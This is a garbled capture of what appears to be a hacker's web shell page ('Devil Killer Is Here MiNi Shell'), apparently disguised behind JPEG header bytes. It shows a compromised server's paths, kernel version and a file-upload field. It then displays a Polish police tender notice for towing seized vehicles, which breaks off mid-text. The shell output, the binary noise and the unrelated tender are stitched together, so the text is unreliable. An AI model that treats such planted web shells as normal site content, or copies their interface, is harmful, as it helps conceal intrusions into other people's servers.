JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211013/0023151701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Holowanie pojazdów ( i innych przedmiotów- części samochodowych) zabezpieczonych do celów procesowych zabezpieczonych przez Policję KPP Krapkowice- zadanie nr 6 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji w Opolu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531125704</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Korfantego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-077</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@op.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://opolska.policja.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Holowanie pojazdów ( i innych przedmiotów- części samochodowych) zabezpieczonych do celów procesowych zabezpieczonych przez Policję KPP Krapkowice- zadanie nr 6 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-418e99ba-2a74-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00231517</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011389/22/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 zadanie nr 6 - Holowanie pojazdów (i innych przedmiotów - części samochodowych) zabezpieczonych do celów procesowych przez Policję - KPP Krapkowice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kwp-opole.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://kwp-opole.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postęp. komunikacja i przesyłanie dokumentów między Zamawiającym, a Wykonawcami odbywa się za<br/>pośrednictwem Platformy. Postęp. prowadzone jest w j.polskim. Dokumenty, które wpłyną do<br/>Zamawiającego, uważa się za złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego<br/>przed upływem tego terminu. Za datę wpływu dokumentów przyjmuje się datę ich złożenia/wysłania na<br/>Platformie. Oznaczenie momentu odbioru danych przez Platformę stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem<br/>czasu. Wszelka korespondencja przekazywana Zamawiającemu drogą elektron., będzie odbierana<br/>wyłącznie w dni robocze (bez sobót) od g.7.30 do g.15.30. Z przesyłaną korespondencją po g.15.30,<br/>Zamawiający będzie mógł skutecznie zapoznać się w następnym dniu roboczym. W sytuacji awaryjnej<br/>(np. gdy nie działa Platforma) Wykonawca może również komunikować się z Zamawiającym za<br/>pomocą poczty elektronicznej na adres zamowienia@op.policja.gov.pl Za datę wpływu oświadczeń,<br/>wniosków, zawiadomień oraz informacji przekazywanych na adres e-mail Zamawiającego przyjmuje się<br/>datę dostarczenia wiadomości na adres e-mail Zamawiającego. Na Platformie w zakładce Regulacje i<br/>procedury procesu zakupowego znajdują się informacje opisujące warunki, wymagania dot.<br/>komunikacji i składania oferty, z którymi wykonawca jest zobowiązany się zapoznać. Ogólne zasady<br/>korzystania z Platformy:1)Zgłoszenie do postęp. wymaga zalogowania Wykonawcy do systemu na<br/>https://kwp-opole.ezamawiajacy.pl2)Wykonawca po wybraniu opcji „przystąp do postępowania”<br/>zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o<br/>możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło,<br/>wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.3)Rejestracja Wykonawcy<br/>trwa max do 2 dni roboczych. W zw. z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu<br/>niezbędnego na rejestracje w procesie złożenia oferty w postaci elektronicznej. Wykonawca wraz z<br/>potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia<br/>procedury założenia konta, wówczas należy skontaktować się z numerem telefonu podanym w ww.<br/>potwierdzeniu.4)Po założeniu konta Wykonawca ma możliwość złożenia oferty wraz z załącznikami w<br/>postępowaniu. W przypadku wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinform.: tel. 22 257 22 23, e-mail:<br/>oneplace@marketplanet.pl. (infolinia dostępna w dni robocze w godz. 9-17).Zamawiający określa<br/>dopuszczalny format podpisu elektronicznego, jako:1)dokumenty w formacie „pdf" zaleca się podpisywać formatem PAdES,2)dopuszcza się podpisanie dokumentów w formacie innym niż „pdf".<br/>Wtedy będzie wymagany oddzielny plik z podpisem. W zw. z tym Wykonawca będzie zobowiązany<br/>załączyć oprócz podpisanego dokumentu oddzielny plik z podpisem. Zamawiający określa niezbędne<br/>wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie tj.:1)Stały dostęp do sieci<br/>Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;2)Komputer klasy PC lub MAC, o<br/>następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;3)Zainstalowana dowolna<br/>przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet<br/>Explorer minimalnie wersja 10.0;4)Włączona obsługa JavaScript;5)Zainstalowany program Acrobat<br/>Reader lub inny obsługujący pliki w formacie .pdf.Zamawiający określa dopuszczalne formaty<br/>przesyłanych danych tj. plików o wielkości do 100 MB w formatach: .txt; .rft; .pdf; .xps; .odt; .ods; .odp;<br/>.doc; .xls; .ppt; .docx; .xlsx; .pptx; XAdES; PAdES; zip; .7Z. Wielkość pliku opatrzonego podpisem<br/>zaufanym nie może przekroczyć 10MB</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:*administratorem Pani/Pana danych osobowych jest<br/>Komendant Wojewódzki Policji z siedzibą w Opolu, ul. Korfantego 2, 45-077 Opole;*inspektorem<br/>ochrony danych osobowych w Komendzie Wojewódzkiej Policji w Opolu jest wyznaczony przez<br/>Komendanta Wojewódzkiego Policji w Opolu inspektor ochrony danych; kontakt: ul. Korfantego 2, 45-<br/>077 Opole, e-mail: iod.kwp@op.policja.gov.pl. Dane inspektora ochrony danych znajdują się na stronie<br/>BIP KWP w Opolu w zakładce „Ochrona danych osobowych”*Pani/Pana dane osobowe przetwarzane<br/>będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o<br/>udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym; odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z<br/>2019 r. poz. 2019 z późn. zm.)*Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust.1<br/>Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas<br/>trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, jednak<br/>nie krócej niż przez okres wskazany w przepisach ustawy o narodowym zasobie archiwalnym i<br/>archiwach oraz Zarządzeniu Ministra Spraw Wewnętrznych i Administracji w sprawie jednolitego<br/>rzeczowego wykazu akt Policji;*obowiązek podania przez Panią/Pana danych osobowych<br/>bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Pzp,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z Pzp; *w odniesieniu do Pani/Pana danych osobowych<br/>decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;*posiada<br/>Pani/Pan:− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników);− na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego) ; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>Pani/Pana dotyczących narusza przepisy RODO;*nie przysługuje Pani/Panu:− w związku z art. 17 ust.<br/>3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WS-ZF.2380.33.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usuwanie i holowanie/przewożenie pojazdów i innych przedmiotów (mienia – części samochodowych) na warunkach określonych w opisie przedmiotu zamówienia (OPZ) dla KPP Krapkowice, stanowiącym załącznik do wzoru umowy, będącym integralną częścią SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50118000-5 - Usługi w zakresie pomocy drogowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">27 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni oferty niepodlegające odrzuceniu według kryteriów:<br/>- cena oferty brutto<br/>-odległość</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez<br/>Zamawiającego warunki udziału w postępowaniu dotyczące;<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów:<br/>Wykonawca spełni warunek jeśli wykaże, że:<br/>- posiada zezwolenie na wykonywanie zawodu przewoźnika drogowego dla zespołów pojazdów<br/>o DMC pow. 3,5 tony lub licencję na wykonywanie transportu drogowego przeznaczonego do<br/>usuwania i holowania pojazdów zgodnie z ustawą z dnia 6 września 2001 r. o transporcie<br/>drogowym (tekst jednolity Dz. U. z 2021 poz. 919 z późn. zm.)Podmiot gospodarczy posiadający<br/>aktualną licencję na wykonywanie krajowego transportu drogowego rzeczy, uznaje się za<br/>posiadającego zezwolenie na wykonywanie zawodu przewoźnika drogowego.<br/>2. sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek jeśli wykaże, że:<br/>- posiada umowę ubezpieczenia OC w zakresie prowadzonej działalności gospodarczej<br/>dotyczącej przedmiotu zamówienia obejmującą zakres deliktowy w wysokości min. 50 000,00 zł.<br/>Polisa powinna obejmować swoim zakresem odpowiedzialności zakres działalności PKD<br/>52.21.Z ( holowanie i pomoc drogowa). Powyższy zakres działalności musi być wpisany w Polisę<br/>3. zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek jeśli wykaże, że:<br/>- dysponuje co najmniej dwoma kierowcami, w tym:<br/>• co najmniej jednym kierowcą posiadającym uprawnienia do kierowania pojazdem holującym<br/>wszystkie pojazdy o DMC do 3,5t włącznie ( od 0,01 kg do 3,5 t).<br/>• co najmniej jednym kierowcą posiadającym uprawnienia do kierowania pojazdem holującym<br/>wszystkie pojazdy (mogące poruszać się po drogach publicznych) o DMC pow. 3,5t<br/>- dysponuje sprawnym technicznie sprzętem transportowym umożliwiającym wykonanie usługi<br/>w pełnym zakresie tj. co najmniej dwoma pojazdami specjalnie przystosowanymi<br/>do holowania/przewozu uszkodzonych pojazdów samochodowych w tym jednym<br/>przystosowanym do holowania/przewozu wszystkich uszkodzonych pojazdów o DMC do 3,5t<br/>włącznie ( od 0,01 kg do 3,5t) Ładowność pojazdu holującego musi być min. 3,5 t.( 3 500 kg) i<br/>drugim przystosowanym do holowania/przewozu wszystkich uszkodzonych pojazdów<br/>(mogących poruszyć się po drogach publicznych) o DMC przekraczających 3,5 t<br/>Wskazany sprzęt musi spełniać wymagania określone w Rozporządzeniu Ministra Infrastruktury z<br/>dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz ich niezbędnego<br/>wyposażenia (tekst jednolity Dz. U.<br/>z 2016 r. poz. 2022 z późn. zm.), tj. musi posiadać:<br/>• aktualny wpis w dowodzie rejestracyjnym, z którego wynika, że jest to pojazd specjalny o<br/>przeznaczeniu pomocy drogowej- zgodnie z przepisami ustawy z dnia 20 czerwca 1997 r. Prawo<br/>o ruchu drogowym<br/>• ważne badania techniczne - zgodnie z przepisami ustawy z dnia 20 czerwca 1997 r. Prawo o<br/>ruchu drogowym.<br/>• oznakowanie które spełnia wymagania określone w Rozporządzeniu Ministra Infrastruktury z<br/>dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz ich niezbędnego<br/>wyposażenia (Dz. U. z 2016, poz.2022 r. z późn. zm.)<br/>• ubezpieczenie OC. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca składa w zakresie:<br/>1) kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, zamawiający żąda<br/>następujących dokumentów:<br/>- zezwolenia na wykonywanie zawodu przewoźnika drogowego dla zespołów pojazdów<br/>o DMC pow. 3,5 tony lub licencji na wykonywanie transportu drogowego przeznaczonego<br/>do usuwania i holowania pojazdów zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym<br/>(tekst jednolity Dz. U. z 2019 poz. 2140 z późn. zm.)<br/>Podmiot gospodarczy posiadający aktualną licencję na wykonywanie krajowego transportu drogowego<br/>rzeczy, uznaje się za posiadającego zezwolenie na wykonywanie zawodu przewoźnika drogowego.<br/>2) sytuacji ekonomicznej lub finansowej zamawiający żąda następujących dokumentów:<br/>- umowę ubezpieczenia OC w zakresie prowadzonej działalności gospodarczej dotyczącej przedmiotu<br/>zamówienia obejmującą zakres deliktowy w wysokości<br/>min. 50 000,00 zł. Polisa powinna obejmować swoim zakresem odpowiedzialności zakres działalności<br/>PKD 52.21.Z ( holowanie i pomoc drogowa). Powyższy zakres działalności musi być wpisany w Polisę<br/>3) zdolności technicznej lub zawodowej zamawiający żąda następujących dokumentów:<br/>- wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami<br/>- wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu<br/>wykonania zamówienia publicznego wraz z informacją o podstawie dysponowania tymi zasobami</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do<br/>oferty:-oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy.- pełnomocnictwo lub inny dokument (np. umowa o współdziałaniu) dla<br/>pełnomocnika ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (konsorcjum, spółka cywilna) do reprezentowania ich w postępowaniu o<br/>udzielenie przedmiotowego zamówienia lub do reprezentowania ich w postępowaniu oraz<br/>zawarcia umowy w sprawie niniejszego zamówienia;- oświadczenie, o którym mowa w art. 125<br/>ust. 1 Pzp składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.W przypadku<br/>oferty wspólnej na formularzu ofertowym należy wymienić z nazwy z podaniem adresu 